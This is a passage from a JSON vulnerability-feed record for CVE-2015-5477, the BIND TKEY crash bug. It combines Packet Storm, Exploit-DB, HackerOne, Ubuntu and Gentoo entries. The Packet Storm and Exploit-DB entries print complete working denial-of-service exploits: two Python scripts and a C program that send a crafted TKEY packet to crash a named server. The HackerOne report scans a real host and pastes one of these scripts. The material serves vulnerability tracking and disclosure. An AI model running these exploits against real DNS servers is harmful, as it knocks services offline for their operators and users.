"https://lists.centos.org/pipermail/centos-announce/2015-July/058188.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:09", "description": "", "cvss3": {}, "published": "2015-07-31T00:00:00", "type": "packetstorm", "title": "BIND TKEY Query Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-31T00:00:00", "id": "PACKETSTORM:132926", "href": "https://packetstormsecurity.com/files/132926/BIND-TKEY-Query-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python \n# Title: BIND Remote DoS via TKEY queries \n# aka: DNS TKEY Query of Death \n# Author: Lorenzo Corsini <serdat> \n# E-Mail: serdat5[at]gmail[dot]com \n# Twitter: https://twitter.com/serdat5tm \n \n# References: \n# https://kb.isc.org/article/AA-01272 \n# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/ \n \n# Warning there is no way to use this PoC in a non-desruptive manner. \n# Use with care. I'm not responsible for what you'll do with that \n \nimport socket \nimport sys \n \n#Not randomized. \nDNS_PACKET='\\x04X\\x00\\x80\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x03xxx\\x00\\x00\\xf9\\x00\\xff\\x03xxx\\x00\\x00\\xf9\\x00\\xff\\x00\\x00\\x00\\x00\\x00%\\x03xxx\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x00\\x00\\x03xxx\\x00\\x00\\x10\\x00\\xff\\x00\\x00\\x00\\x00\\x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' \n \ntry: \nHOST=sys.argv[1] \nPORT= 53 \nexcept: \nprint \"Usage: %s host_to_crash\" & sys.argv[0] \nsys.exit(-1) \n \nprint \"Exploiting target at %s\" % HOST \n \ns=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) \ns.sendto(DNS_PACKET,(HOST,PORT)) \ns.close() \n \nprint \"Check Manually if the exploit worked... try launching:\" \nprint \"dig @%s CR4SH3D any\" % HOST \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132926/tkey_dos.py.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2018-12-17T15:36:38", "bounty": 0.0, "description": "Hello Team NextCloud,\n\nIn reference report #217381\nI've reported the DDOS attack via DNS Port at OwnCloud..\nAnd it was successfully patched.\n\nBut now same issue I got at\n\n```\nci.nextcloud.com\n```\nProof Of Concept:\nHere it is the nmap result of ci.nextcloud.com\n\nNMap Scan Results:\n```\nStarting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT\nNmap scan report for ci.nextcloud.com (\u2588\u2588\u2588\u2588\u2588)\nHost is up (0.077s latency).\nrDNS record for \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\nNot shown: 96 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open tcpwrapped\n53/tcp open tcpwrapped\n80/tcp open tcpwrapped\n443/tcp open tcpwrapped\n```\nNow here it is the telnet result:\n```\n\u2500\u2500\u257c $telnet\ntelnet> open\n(to) ci.nextcloud.com 53\nTrying \u2588\u2588\u2588...\nConnected to ci.nextcloud.com.\nEscape character is '^]'.\n```\n\nSo this can leads to a serious DDOS attack at doc.owncloud.com using the exploit..\n\nExploit Link:\n\n```\nhttps://github.com/elceef/tkeypoc/\n```\nVulnerability Reference CVE Details:\n\n```\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\n```\nExploit PoC:\n\nExploit Title: PoC for BIND9 TKEY DoS\n\nExploit Author: elceef\n\nSoftware Link: https://github.com/elceef/tkeypoc/\n\nVersion: ISC BIND 9\n\nTested on: multiple\n\nCVE : CVE-2015-5477\n\n```\n!/usr/bin/env python\n\nimport socket\nimport sys\n\nprint('CVE-2015-5477 BIND9 TKEY PoC')\n\nif len(sys.argv) < 2:\nprint('Usage: ' + sys.argv[0] + ' [target]')\nsys.exit(1)\n\nprint('Sending packet to ' + sys.argv[1] + ' ...')\n\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], 53))\n\nprint('Done.')\n```\n\nThanks :)\n", "edition": 2, "cvss3": {}, "published": "2017-06-07T23:28:05", "type": "hackerone", "title": "Nextcloud: ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-06-08T17:51:14", "id": "H1:237860", "href": "https://hackerone.com/reports/237860", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-04T17:41:05", "description": "", "cvss3": {}, "published": "2015-08-05T00:00:00", "type": "exploitdb", "title": "ISC BIND 9 - TKEY Remote Denial of Service (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["2015-5477", "CVE-2015-5477"], "modified": "2015-08-05T00:00:00", "id": "EDB-ID:37723", "href": "https://www.exploit-db.com/exploits/37723", "sourceData": "#!/usr/bin/env python\r\n\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n\r\n\r\nimport socket\r\nimport sys\r\n\r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n\r\nif len(sys.argv) < 2:\r\n\tprint('Usage: ' + sys.argv[0] + ' [target]')\r\n\tsys.exit(1)\r\n\r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n\r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n\r\nprint('Done.')", "sourceHref": "https://www.exploit-db.com/download/37723", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-01-13T05:50:03", "description": "", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "exploitdb", "title": "ISC BIND 9 - TKEY (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477", "2015-5477"], "modified": "2015-08-01T00:00:00", "id": "EDB-ID:37721", "href": "https://www.exploit-db.com/exploits/37721", "sourceData": "/*\r\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\r\n\r\n Usage:\r\n tkill <hostname>\r\n\r\n What it does:\r\n - First sends a \"version\" query to see if the server is up.\r\n - Regardless of the version response, it then sends the DoS packet.\r\n - Then it waits 5 seconds for a response. If the server crashes,\r\n there will be no response.\r\n\r\n Notes:\r\n - multiple hostnames can be specified on the command-line\r\n - IP addresses can be specified instead of hostnames\r\n - supports IPv4 and IPv6\r\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\r\n - if a hostname resolves to more than one IP, then all IPs\r\n will be probed\r\n\r\n About the vuln:\r\n For control information, the \"TSIG\" feature allows packets to be\r\n signed with a password. This allows slave servers to get updates\r\n from master servers without a MitM attack (like from the NSA)\r\n changing the data on the network.\r\n\r\n A password can be distributed out of band, such as SSHing into\r\n a box and editing the configuration file. Anther way is through\r\n public-keys. That's the \"TKEY\" feature: it distributes new\r\n TSIG passwords using public-keys.\r\n\r\n When processing a TKEY packet, the code will call a function to\r\n fetch the proper TKEY record. It looks in two places: the\r\n \"answer records\" section, and the \"additional records\" section.\r\n If it can't find it in the \"additional\", it looks in \"answer\".\r\n\r\n The lookup function takes a parameter that is initially set\r\n to NULL. During the failed lookup in the \"additional\" section,\r\n it may set that parameter to a non-null value. Since a non-null\r\n value is passed in again during the second lookup in the \"answer\"\r\n section, the code crashes.\r\n\r\n The patch was to set the variable to NULL before the second lookup.\r\n\r\n The correct fix would simply not check to see if the parameter\r\n was NULL to be begin with. It's an out-only parameter, so it's value\r\n on input doesn't matter.\r\n\r\n This is a just a \"brainfart\" bug that can only result in a crash\r\n of the server. It cann't result in data-corruption or code\r\n execution.\r\n\r\n About this code:\r\n To learn about writing network code, this is probably something useful\r\n to study.\r\n\r\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\r\n the differences are between the two platforms, as well as the simularities.\r\n\r\n It works on both IPv4 and IPv6. However, if you search through the code,\r\n you'll find nothing that specifically references either version. It's\r\n magically dual-stack. That's because it uses new functions like\r\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\r\n \r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n\r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n#define WSA(err) (WSA##err)\r\n#define WSAEAGAIN WSAETIMEDOUT\r\n#else\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define WSAGetLastError() (errno)\r\n#define WSA(err) (err)\r\n#define closesocket(fd) close(fd)\r\n#endif\r\n\r\n/*\r\n * DoS packet that will crash server\r\n */\r\nstatic const unsigned char dospacket[] = {\r\n 0x01, 0x02, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\r\n\r\n /* Query name */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\r\n 0x00, 249, /* TKEY record type */\r\n 0x00, 255,\r\n\r\n /* Additional record */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\r\n 0x00, 16, /* record type: must NOT be 249/TKEY */\r\n 0x00, 255,\r\n 0, 0, 0, 0,\r\n 0, 51,\r\n 50,\r\n 'h', 't', 't', 'p', 's', ':', '/', '/', \r\n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \r\n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \r\n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \r\n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \r\n '-', '2', '0', '1', '5', '-', '5', '4', \r\n '7', '7'\r\n};\r\n\r\n\r\n/*\r\n * Packet for querying the version of the server, to test if it's up\r\n */\r\nstatic const unsigned char versionpacket[] = {\r\n 0x03, 0x04, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x00, /* no additional */\r\n\r\n /* Query name */\r\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\r\n 0x00, 16, /* TXT */\r\n 0x00, 3, /* CHOAS */\r\n};\r\n\r\n\r\n/*\r\n * YOLO BIND version.bind query\r\n */\r\nint query_version(int fd, const struct addrinfo *target)\r\n{\r\n int bytes_received;\r\n int i;\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n char hostname[256];\r\n unsigned char buf[2048];\r\n int result = 0;\r\n\r\n /* \r\n * Query version \r\n */\r\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \r\n target->ai_addr, target->ai_addrlen);\r\n\r\n\r\n /* \r\n * get response \r\n */\r\nagain:\r\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\r\n return 0;\r\n } else if (bytes_received <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n return 0;\r\n }\r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n\r\n /* \r\n * parse response \r\n */\r\n if (bytes_received < 12)\r\n goto again;\r\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\r\n goto again;\r\n if ((buf[2]&0x80) != 0x80)\r\n goto again;\r\n\r\n /*\r\n * Handle respoonse code \r\n */\r\n switch (buf[3]&0x0F) {\r\n case 0:\r\n /* parse packet below */\r\n break;\r\n case 1:\r\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\r\n return 1;\r\n case 2:\r\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\r\n return 1;\r\n case 3:\r\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\r\n return 1;\r\n case 4:\r\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\r\n return 1;\r\n case 5:\r\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\r\n return 1;\r\n default:\r\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\r\n return 1;\r\n }\r\n\r\n\r\n i = 12; /* skip header */\r\n\r\n /* \r\n * skip query name \r\n */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n i += 4;\r\n\r\n /* \r\n * process all answers \r\n */\r\n while (i + 12 <= bytes_received) {\r\n int t, c, len;\r\n\r\n /* skip answer name */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n\r\n /* extract resource-recorder header */\r\n if (i + 10 > bytes_received)\r\n break;\r\n t = buf[i+0]<<8 | buf[i+1];\r\n c = buf[i+2]<<8 | buf[i+3];\r\n len = buf[i+8]<<8 | buf[i+9];\r\n i += 10;\r\n\r\n /* verify TXT CHAOS */\r\n if (t != 16 || c != 3) {\r\n i += len;\r\n continue;\r\n }\r\n\r\n /* fix len */\r\n if (len > bytes_received - i)\r\n len = bytes_received - i;\r\n\r\n /* print the hostname */\r\n fprintf(stderr, \"[+] %s: \", hostname);\r\n\r\n /* print the strings */\r\n {\r\n int j = i;\r\n\r\n i += len;\r\n\r\n while (j < i) {\r\n int len2 = buf[j];\r\n int k;\r\n j++;\r\n if (len2 > bytes_received - len2)\r\n len2 = bytes_received - len2;\r\n fprintf(stderr, \"\\\"\");\r\n\r\n for (k=j; k<j+len2; k++) {\r\n if (buf[k] == '\\\\')\r\n fprintf(stderr, \"\\\\\");\r\n else if (!isprint(buf[k]))\r\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\r\n else\r\n fprintf(stderr, \"%c\", buf[k]);\r\n }\r\n\r\n j = k;\r\n\r\n fprintf(stderr, \"\\\" \");\r\n }\r\n fprintf(stderr, \"\\n\");\r\n }\r\n result = 1;\r\n }\r\n return result;\r\n}\r\n\r\n/*\r\n * Send the DoS packet\r\n */\r\nvoid probe(const struct addrinfo *target)\r\n{\r\n int fd;\r\n int x;\r\n int i;\r\n char hostname[256];\r\n char buf[2048];\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n \r\n \r\n /*\r\n * Print status\r\n */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\r\n\r\n /*\r\n * Create a socket\r\n */\r\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\r\n if (fd <= 0) {\r\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\r\n return;\r\n }\r\n\r\n /*\r\n * Set the timeout to 5-seconds\r\n */\r\n {\r\n#ifdef WIN32\r\n int milliseconds = 5000;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\r\n#else\r\n struct timeval t;\r\n t.tv_sec = 5;\r\n t.tv_usec = 0;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\r\n#endif\r\n\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\r\n }\r\n }\r\n\r\n\r\n /*\r\n * First, query the server to grab its version, but also to see it's up\r\n */\r\n fprintf(stderr, \"[+] Querying version...\\n\");\r\n for (i=0; i<3; i++) {\r\n if (query_version(fd, target))\r\n break;\r\n if (i == 2) {\r\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\r\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\r\n }\r\n }\r\n\r\n\r\n /*****************\r\n * SEND DoS PACKET\r\n *****************/\r\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\r\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\r\n\r\n /* Grab response */\r\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\r\n for (;;) {\r\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\r\n break;\r\n } else if (x <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n break;;\r\n }\r\n\r\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\r\n continue;\r\n \r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\r\n break;\r\n }\r\n\r\n\r\n closesocket(fd);\r\n}\r\n\r\n\r\n/*\r\n * The main function just parses the arguments and looks up IP addrsses\r\n * before calling the \"probe\" function to actually exploit the targets\r\n */\r\nint main(int argc, char *argv[])\r\n{\r\n int i;\r\n\r\n#ifdef WIN32\r\n {WSADATA x; WSAStartup(0x101, &x);}\r\n#endif\r\n\r\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\r\n\r\n if (argc <= 1) {\r\n fprintf(stderr, \"[-] no host specified\\n\");\r\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\r\n return -1;\r\n }\r\n\r\n\r\n /*\r\n * Query all targets specified on the command line\r\n */\r\n for (i=1; i<argc; i++) {\r\n const char *hostname = argv[i];\r\n struct addrinfo *info;\r\n struct addrinfo *target;\r\n char oldtarget[256] = \"\";\r\n int x;\r\n\r\n /*\r\n * Lookup the name of the target\r\n */\r\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\r\n x = getaddrinfo(hostname, \"53\", 0, &info);\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\r\n continue;\r\n }\r\n\r\n if (info->ai_next) {\r\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\r\n }\r\n\r\n /*\r\n * Since a name can return multiple IP addresses,\r\n * send a probe to all the results\r\n */\r\n for (target=info; target; target = target->ai_next) {\r\n char newtarget[256];\r\n\r\n /* bah, stupid bug in Linux gets the same target multiple\r\n * times */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\r\n if (strcmp(newtarget, oldtarget) == 0)\r\n continue;\r\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\r\n\r\n probe(target);\r\n printf(\"\\n\");\r\n }\r\n\r\n /*\r\n * Cleanup\r\n */\r\n freeaddrinfo(info);\r\n }\r\n\r\n return 0;\r\n}", "sourceHref": "https://www.exploit-db.com/download/37721", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:37:39", "description": "Jonathan Foote discovered that Bind incorrectly handled certain TKEY \nqueries. A remote attacker could use this issue with a specially crafted \npacket to cause Bind to crash, resulting in a denial of service. \n(CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain \nconfigurations involving DNS64. A remote attacker could use this issue with \na specially crafted query to cause Bind to crash, resulting in a denial of \nservice. This issue only affected Ubuntu 12.04 LTS. (CVE-2012-5689)\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "ubuntu", "title": "Bind vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5689", "CVE-2015-5477"], "modified": "2015-07-28T00:00:00", "id": "USN-2693-1", "href": "https://ubuntu.com/security/notices/USN-2693-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:51", "description": "### Background\n\nBIND (Berkeley Internet Name Domain) is a Name Server.\n\n### Description\n\nA vulnerability has been discovered in BIND\u2019s named utility leading to a Denial of Service condition. \n\n### Impact\n\nA remote attacker may be able to cause Denial of Service condition via specially constructed zone data. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll BIND users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.10.2_p4\"", "cvss3": {}, "published": "2015-10-18T00:00:00", "type": "gentoo", "title": "BIND: Denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-5986"], "modified": "2015-10-18T00:00:00", "id": "GLSA-201510-01", "href": "https://security.gentoo.org/glsa/201510-01", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}
